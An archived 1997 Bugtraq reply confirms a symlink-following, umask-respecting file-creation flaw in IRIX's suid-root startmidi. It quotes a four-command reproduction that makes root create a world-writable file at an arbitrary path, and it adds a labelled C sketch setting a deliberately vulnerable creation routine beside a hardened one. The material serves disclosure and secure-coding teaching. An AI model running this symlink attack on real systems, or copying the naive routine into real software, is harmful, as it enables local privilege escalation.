[4028] in bugtraq
Re: IRIX: Bug in startmidi
daemon@ATHENA.MIT.EDU (Astley Chan)
Mon Feb 10 04:03:44 1997
Date: Mon, 10 Feb 1997 12:52:55 +0800
Reply-To: Astley Chan <astley@DMF328.UST.HK>
From: Astley Chan <astley@DMF328.UST.HK>
To: BUGTRAQ@netspace.org
In-Reply-To: <Pine.A41.3.95.970209205954.44418C-100000@t1.chem.umn.edu> from
"Yuri Volobuev" at Feb 9, 97 09:20:36 pm
> > Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
> > noticed a little suid-root program called 'startmidi' which hides in
> > /usr/sbin. When run, this program creates various files in /tmp. You
> > guessed it, it respects umask and follows symlinks. Comme ca:
> >
> > % umask 0
> > % ln -s /blardyblar /tmp/.midipid
> > % startmidi -d /dev/ttyd1
> > % ls -l /blardyblar
> > -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
> > % stopmidi -d /dev/ttyd1
>
> eh... that's strange. I was looking at startmidi a while back, but didn't
> find any root holes. Now I look again, still nothing. Indeed, on my 5.3

umm.. I can successfully create a file owned by root..

> You must have some special configuration, I reckon. On the box I was testing

I don't think it's special to his machine, I've got the same behaviour
as described (though stopmidi can't remove the file already in /tmp).

astley
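
Added example, not part of the original thread and not startmidi's source: a constructed C sketch of the behaviour class reported above (a privileged program creating a fixed-name file, following a symlink and leaving the mode to umask) beside a hardened creation routine. The names pidfile_naive, pidfile_safe and demo are hypothetical, and the demo works only inside a private temporary directory it creates itself.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed shape of the flawed pattern: open() follows a symlink planted at
 * the path, and mode 0666 leaves the final permissions to the caller's umask. */
int pidfile_naive(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Hardened: O_CREAT|O_EXCL fails if the name already exists, including as a
 * (dangling) symlink; O_NOFOLLOW is a second guard. Requesting 0644 means
 * umask, which can only clear bits, can never produce a world-writable file. */
int pidfile_safe(const char *path, pid_t pid) {
    struct stat st;
    char buf[32];
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    /* Confirm we hold a fresh regular file with a single link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    int ok = write(fd, buf, (size_t)n) == n;
    return (close(fd) == 0 && ok) ? 0 : -1;
}

/* Constructed demo: returns 1 when the hardened call refuses the symlink
 * (target not created) and the naive call creates the symlink's target. */
int demo(void) {
    char dir[] = "/tmp/pidemo.XXXXXX", lnk[64], target[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(lnk, sizeof lnk, "%s/.midipid", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lnk) != 0) return -1;
    int refused = pidfile_safe(lnk, getpid()) == -1 && lstat(target, &st) != 0;
    int followed = pidfile_naive(lnk) == 0 && lstat(target, &st) == 0;
    unlink(target); unlink(lnk); rmdir(dir);
    return refused && followed;
}

int main(void) { printf("demo: %d\n", demo()); return 0; }
```

Keeping such state files in a root-owned directory that ordinary users cannot write to (rather than /tmp) removes the opportunity to pre-plant a link at all.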